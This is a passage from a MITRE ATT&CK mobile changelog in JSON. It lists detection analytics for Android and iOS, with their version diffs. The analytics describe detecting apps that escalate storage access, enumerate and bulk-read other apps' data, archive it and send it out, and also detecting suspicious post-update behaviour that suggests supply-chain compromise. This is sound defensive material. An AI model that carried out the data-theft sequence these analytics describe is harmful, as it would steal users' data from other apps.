                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "NSM:Flow",
                            "channel": "HTTPS sessions exhibiting periodic request cadence or structured payload exchanges inconsistent with application baseline"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "NotificationWakeFrequencyThreshold",
                            "description": "Baseline deviation tolerance for background wake events"
                        },
                        {
                            "field": "HTTPSCadenceAnomalyThreshold",
                            "description": "Acceptable deviation in recurring web traffic timing"
                        },
                        {
                            "field": "SessionPersistenceThreshold",
                            "description": "Threshold for abnormal TLS session duration"
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_log_source_references']\": [{\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"NSM:Flow\", \"channel\": \"HTTPS sessions exhibiting periodic request cadence or structured payload exchanges inconsistent with application baseline\"}], \"root['x_mitre_mutable_elements']\": [{\"field\": \"NotificationWakeFrequencyThreshold\", \"description\": \"Baseline deviation tolerance for background wake events\"}, {\"field\": \"HTTPSCadenceAnomalyThreshold\", \"description\": \"Acceptable deviation in recurring web traffic timing\"}, {\"field\": \"SessionPersistenceThreshold\", \"description\": \"Threshold for abnormal TLS session duration\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-02 20:40:39.182000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender observes an application establishing recurrent HTTPS or APNS-related communications exhibiting structured cadence, abnormal session persistence, or notification-triggered network bursts inconsistent with user interaction patterns or declared application behavior.\", \"old_value\": \"Abuse of standard application protocols can be difficult to detect as many legitimate mobile applications leverage such protocols for language-specific APIs. Enterprises may be better served focusing on detection at other stages of adversarial behavior. \"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to193__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to193__0\"><a href=\"#difflib_chg_to193__top\">t</a></td><td class=\"diff_header\" id=\"from193_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Abuse&nbsp;of&nbsp;standard&nbsp;application&nbsp;protocols&nbsp;can&nbsp;be&nbsp;difficult&nbsp;to&nbsp;</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to193__top\">t</a></td><td class=\"diff_header\" id=\"to193_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;observes&nbsp;an&nbsp;application&nbsp;establishing&nbsp;recurrent&nbsp;HTTP</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">detect&nbsp;as&nbsp;many&nbsp;legitimate&nbsp;mobile&nbsp;applications&nbsp;leverage&nbsp;such&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">S&nbsp;or&nbsp;APNS-related&nbsp;communications&nbsp;exhibiting&nbsp;structured&nbsp;caden</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">protocols&nbsp;for&nbsp;language-specific&nbsp;APIs.&nbsp;Enterprises&nbsp;may&nbsp;be&nbsp;bet</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ce,&nbsp;abnormal&nbsp;session&nbsp;persistence,&nbsp;or&nbsp;notification-triggered&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ter&nbsp;served&nbsp;focusing&nbsp;on&nbsp;detection&nbsp;at&nbsp;other&nbsp;stages&nbsp;of&nbsp;adversar</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">network&nbsp;bursts&nbsp;inconsistent&nbsp;with&nbsp;user&nbsp;interaction&nbsp;patterns&nbsp;o</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ial&nbsp;behavior.&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">r&nbsp;declared&nbsp;application&nbsp;behavior.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--7f84f2b8-6ef3-4167-b059-a455d7c40a7d",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-01-29 17:51:41.189000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0621#AN1683",
                            "external_id": "AN1683"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1683",
                    "description": "Defender correlates an app escalating file visibility (permissions/flags, legacy storage modes) with enumeration of other apps\u2019 storage or exported ContentProviders, followed by bulk reads/copies from target paths (including shared/external storage) and optional archive/encode then share/upload. Sequence: storage capability/permission gain \u2192 target discovery (provider queries, directory listing) \u2192 high-volume cross-app data reads from writable/shared paths \u2192 archive/encode \u2192 exfil/share within a short window.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6",
                            "name": "android:logcat",
                            "channel": "Runtime grant or manifest presence for MANAGE_EXTERNAL_STORAGE/READ_EXTERNAL_STORAGE/READ_MEDIA_*; legacy external storage mode detection"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "android:logcat",
                            "channel": "QUERY on exported ContentProviders of other packages (content://<other.pkg>/*) or MediaStore scoped queries immediately preceding file reads"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71",
                            "name": "android:logcat",
                            "channel": "READ or COPY operations where path matches external/shared locations of other apps (e.g., /storage/emulated/0/Android/data/<otherpkg>/files/, /storage/emulated/0/Download/<app>/*)"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "android:logcat",
                            "channel": "CREATE/WRITE of archive or container (.zip/.gz/.7z/.db copy) that aggregates files pulled from other-package paths"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindowSeconds",
                            "description": "Correlation window to tie discovery \u2192 reads \u2192 package \u2192 exfil (e.g., 15\u2013120s)."
                        },
                        {
                            "field": "ExternalStoragePathRegex",
                            "description": "Regex for cross-app paths on external/shared storage to monitor."
                        },
                        {
                            "field": "SuspiciousProviders",
                            "description": "List of exported/weakly-protected content providers under scrutiny."
                        },
                        {
                            "field": "MinBytesRead",
                            "description": "Lower bound on cumulative read volume to avoid noisy single-file accesses."
                        },
                        {
                            "field": "ArchiveExtensions",
                            "description": "Extensions considered packaging (.zip,.gz,.7z,.tar,.db copies)."
                        },
                        {
                            "field": "ExfilDomainAllowlist",
                            "description": "Known good CDNs/APIs to reduce false positives."
                        },
                        {
                            "field": "UserContext",
                            "description": "Foreground/background, Work Profile, developer mode to scope alerts."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindowSeconds\", \"description\": \"Correlation window to tie discovery \\u2192 reads \\u2192 package \\u2192 exfil (e.g., 15\\u2013120s).\"}, {\"field\": \"ExternalStoragePathRegex\", \"description\": \"Regex for cross-app paths on external/shared storage to monitor.\"}, {\"field\": \"SuspiciousProviders\", \"description\": \"List of exported/weakly-protected content providers under scrutiny.\"}, {\"field\": \"MinBytesRead\", \"description\": \"Lower bound on cumulative read volume to avoid noisy single-file accesses.\"}, {\"field\": \"ArchiveExtensions\", \"description\": \"Extensions considered packaging (.zip,.gz,.7z,.tar,.db copies).\"}, {\"field\": \"ExfilDomainAllowlist\", \"description\": \"Known good CDNs/APIs to reduce false positives.\"}, {\"field\": \"UserContext\", \"description\": \"Foreground/background, Work Profile, developer mode to scope alerts.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-29 17:51:41.189000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender correlates an app escalating file visibility (permissions/flags, legacy storage modes) with enumeration of other apps\\u2019 storage or exported ContentProviders, followed by bulk reads/copies from target paths (including shared/external storage) and optional archive/encode then share/upload. Sequence: storage capability/permission gain \\u2192 target discovery (provider queries, directory listing) \\u2192 high-volume cross-app data reads from writable/shared paths \\u2192 archive/encode \\u2192 exfil/share within a short window.\", \"old_value\": \"Application vetting services could detect when applications store data insecurely, for example, in unprotected external storage.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6\", \"name\": \"android:logcat\", \"channel\": \"Runtime grant or manifest presence for MANAGE_EXTERNAL_STORAGE/READ_EXTERNAL_STORAGE/READ_MEDIA_*; legacy external storage mode detection\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"android:logcat\", \"channel\": \"QUERY on exported ContentProviders of other packages (content://<other.pkg>/*) or MediaStore scoped queries immediately preceding file reads\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71\", \"name\": \"android:logcat\", \"channel\": \"READ or COPY operations where path matches external/shared locations of other apps (e.g., /storage/emulated/0/Android/data/<otherpkg>/files/, /storage/emulated/0/Download/<app>/*)\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"android:logcat\", \"channel\": \"CREATE/WRITE of archive or container (.zip/.gz/.7z/.db copy) that aggregates files pulled from other-package paths\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to125__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to125__0\"><a href=\"#difflib_chg_to125__top\">t</a></td><td class=\"diff_header\" id=\"from125_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;could&nbsp;detect&nbsp;when&nbsp;applications&nbsp;</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to125__top\">t</a></td><td class=\"diff_header\" id=\"to125_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;correlates&nbsp;an&nbsp;app&nbsp;escalating&nbsp;file&nbsp;visibility&nbsp;(permi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">store&nbsp;data&nbsp;insecurely,&nbsp;for&nbsp;example,&nbsp;in&nbsp;unprotected&nbsp;external&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ssions/flags,&nbsp;legacy&nbsp;storage&nbsp;modes)&nbsp;with&nbsp;enumeration&nbsp;of&nbsp;othe</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">storage.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">r&nbsp;apps\u2019&nbsp;storage&nbsp;or&nbsp;exported&nbsp;ContentProviders,&nbsp;followed&nbsp;by&nbsp;bu</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">lk&nbsp;reads/copies&nbsp;from&nbsp;target&nbsp;paths&nbsp;(including&nbsp;shared/external</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;storage)&nbsp;and&nbsp;optional&nbsp;archive/encode&nbsp;then&nbsp;share/upload.&nbsp;Seq</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">uence:&nbsp;storage&nbsp;capability/permission&nbsp;gain&nbsp;\u2192&nbsp;target&nbsp;discovery</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;(provider&nbsp;queries,&nbsp;directory&nbsp;listing)&nbsp;\u2192&nbsp;high-volume&nbsp;cross-a</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">pp&nbsp;data&nbsp;reads&nbsp;from&nbsp;writable/shared&nbsp;paths&nbsp;\u2192&nbsp;archive/encode&nbsp;\u2192&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">exfil/share&nbsp;within&nbsp;a&nbsp;short&nbsp;window.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--b755f519-cc0c-44a4-865f-fa9ead44590f",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-01-29 18:00:59.178000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0621#AN1684",
                            "external_id": "AN1684"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1684",
                    "description": "Defender correlates attempts to access other apps\u2019 data via shared containers (App Groups), Photos/Files providers, pasteboard abuse, or jailbroken cross-container reads, followed by aggregation/packaging and optional exfil/share. Sequence: capability/consent (TCC/entitlements) \u2192 target discovery (AppGroup/Photos/Files enumeration, URL schemes) \u2192 bulk read from shared/foreign container or provider \u2192 package/encode \u2192 exfil/share.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6",
                            "name": "iOS:unifiedlog",
                            "channel": "Privacy (TCC) prompts/grants for Photos/Files or access changes indicating new visibility into user/app data"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71",
                            "name": "iOS:unifiedlog",
                            "channel": "READ operations from App Group containers (/var/mobile/Containers/Shared/AppGroup/...) or Files/Photos provider mountpoints, especially when group not owned by bundle"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "iOS:unifiedlog",
                            "channel": "Repeated or large UIPasteboard reads; background pasteboard access shortly before packaging"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "iOS:unifiedlog",
                            "channel": "CREATE/WRITE of archive/container (.zip/.gz/.7z/.db export) aggregating recently read items"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindowSeconds",
                            "description": "Correlation window for consent/discovery \u2192 read \u2192 package \u2192 exfil (e.g., 20\u2013180s)."
                        },
                        {
                            "field": "AppGroupAllowlist",
                            "description": "Allowed App Group IDs for each bundle to reduce FPs."
                        },
                        {
                            "field": "ProviderScope",
                            "description": "Files/Photos provider collections permitted for the app."
                        },
                        {
                            "field": "MinBytesRead",
                            "description": "Lower bound on cumulative read size to signal collection vs casual access."
                        },
                        {
                            "field": "ArchiveExtensions",
                            "description": "Packaging extensions to track when aggregating data."
                        },
                        {
                            "field": "ExfilDomainAllowlist",
                            "description": "Known-good enterprise domains/CDNs for uploads."
                        },
                        {
                            "field": "UserContext",
                            "description": "Foreground/background and Work Profile state to scope analytics."
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindowSeconds\", \"description\": \"Correlation window for consent/discovery \\u2192 read \\u2192 package \\u2192 exfil (e.g., 20\\u2013180s).\"}, {\"field\": \"AppGroupAllowlist\", \"description\": \"Allowed App Group IDs for each bundle to reduce FPs.\"}, {\"field\": \"ProviderScope\", \"description\": \"Files/Photos provider collections permitted for the app.\"}, {\"field\": \"MinBytesRead\", \"description\": \"Lower bound on cumulative read size to signal collection vs casual access.\"}, {\"field\": \"ArchiveExtensions\", \"description\": \"Packaging extensions to track when aggregating data.\"}, {\"field\": \"ExfilDomainAllowlist\", \"description\": \"Known-good enterprise domains/CDNs for uploads.\"}, {\"field\": \"UserContext\", \"description\": \"Foreground/background and Work Profile state to scope analytics.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-29 18:00:59.178000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Defender correlates attempts to access other apps\\u2019 data via shared containers (App Groups), Photos/Files providers, pasteboard abuse, or jailbroken cross-container reads, followed by aggregation/packaging and optional exfil/share. Sequence: capability/consent (TCC/entitlements) \\u2192 target discovery (AppGroup/Photos/Files enumeration, URL schemes) \\u2192 bulk read from shared/foreign container or provider \\u2192 package/encode \\u2192 exfil/share.\", \"old_value\": \"Application vetting services could detect when applications store data insecurely, for example, in unprotected external storage.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6\", \"name\": \"iOS:unifiedlog\", \"channel\": \"Privacy (TCC) prompts/grants for Photos/Files or access changes indicating new visibility into user/app data\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71\", \"name\": \"iOS:unifiedlog\", \"channel\": \"READ operations from App Group containers (/var/mobile/Containers/Shared/AppGroup/...) or Files/Photos provider mountpoints, especially when group not owned by bundle\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa\", \"name\": \"iOS:unifiedlog\", \"channel\": \"Repeated or large UIPasteboard reads; background pasteboard access shortly before packaging\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"iOS:unifiedlog\", \"channel\": \"CREATE/WRITE of archive/container (.zip/.gz/.7z/.db export) aggregating recently read items\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to175__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to175__0\"><a href=\"#difflib_chg_to175__top\">t</a></td><td class=\"diff_header\" id=\"from175_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;could&nbsp;detect&nbsp;when&nbsp;applications&nbsp;</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to175__top\">t</a></td><td class=\"diff_header\" id=\"to175_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;correlates&nbsp;attempts&nbsp;to&nbsp;access&nbsp;other&nbsp;apps\u2019&nbsp;data&nbsp;via&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">store&nbsp;data&nbsp;insecurely,&nbsp;for&nbsp;example,&nbsp;in&nbsp;unprotected&nbsp;external&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">shared&nbsp;containers&nbsp;(App&nbsp;Groups),&nbsp;Photos/Files&nbsp;providers,&nbsp;past</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">storage.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">eboard&nbsp;abuse,&nbsp;or&nbsp;jailbroken&nbsp;cross-container&nbsp;reads,&nbsp;followed&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">by&nbsp;aggregation/packaging&nbsp;and&nbsp;optional&nbsp;exfil/share.&nbsp;Sequence:</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;capability/consent&nbsp;(TCC/entitlements)&nbsp;\u2192&nbsp;target&nbsp;discovery&nbsp;(A</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ppGroup/Photos/Files&nbsp;enumeration,&nbsp;URL&nbsp;schemes)&nbsp;\u2192&nbsp;bulk&nbsp;read&nbsp;f</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">rom&nbsp;shared/foreign&nbsp;container&nbsp;or&nbsp;provider&nbsp;\u2192&nbsp;package/encode&nbsp;\u2192&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">exfil/share.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--c1cdc6fb-9b7f-4076-9634-c939ddaef2bf",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-12 17:37:17.976000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0628#AN1697",
                            "external_id": "AN1697"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1697",
                    "description": "An app or app update arrives through an expected delivery path or presents as a known legitimate package identity, but its post-install or post-update behavior materially changes in ways inconsistent with its historical role. The defender correlates package identity and install/update context, newly expanded capability state, changed runtime framework use, new sensor or storage behaviors, and new network destinations shortly after installation or update to identify likely supply-chain compromise rather than ordinary malicious sideloading or unrelated post-compromise activity.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2",
                            "name": "android:MDMLog",
                            "channel": "Managed app catalog, enterprise update policy, or trusted distribution posture remains unchanged while a known app exhibits materially different post-update behavior"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "Known application or newly updated version declares, gains, or activates expanded storage, sensor, communications, accessibility, or device-management capability inconsistent with prior baseline or app role"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "Updated or newly delivered application becomes active, launches background services, or executes shortly after install/update with minimal user interaction inconsistent with baseline"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Known application begins first-seen or expanded use of content providers, account services, accessibility, package services, cryptographic routines, dynamic loading, or other framework interactions after update/install"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Maximum span between app install/update event and first suspicious post-delivery behavior."
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Approved apps expected to change permissions, add services, or contact new destinations because of legitimate feature releases."
                        },
                        {
                            "field": "AllowedVersionChangeWindow",
                            "description": "Grace period after a documented app release during which some behavior drift may be expected."
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether certain behaviors should only be considered suspicious when they occur without visible user interaction."
                        },
                        {
                            "field": "RecentUserInteractionWindow",
                            "description": "Threshold for determining whether immediate post-update activity was user-driven or autonomous."
                        },
                        {
                            "field": "DestinationAllowList",
                            "description": "Expected new destinations, APIs, CDNs, or telemetry endpoints associated with approved app updates."
                        },
                        {
                            "field": "CapabilityDriftThreshold",
                            "description": "Threshold for how many newly added or newly exercised permissions/capabilities are considered abnormal for a known app."
                        },
                        {
                            "field": "BehaviorBaselinePopulation",
                            "description": "Population of prior devices, versions, or user cohorts used to baseline normal app behavior."
                        }
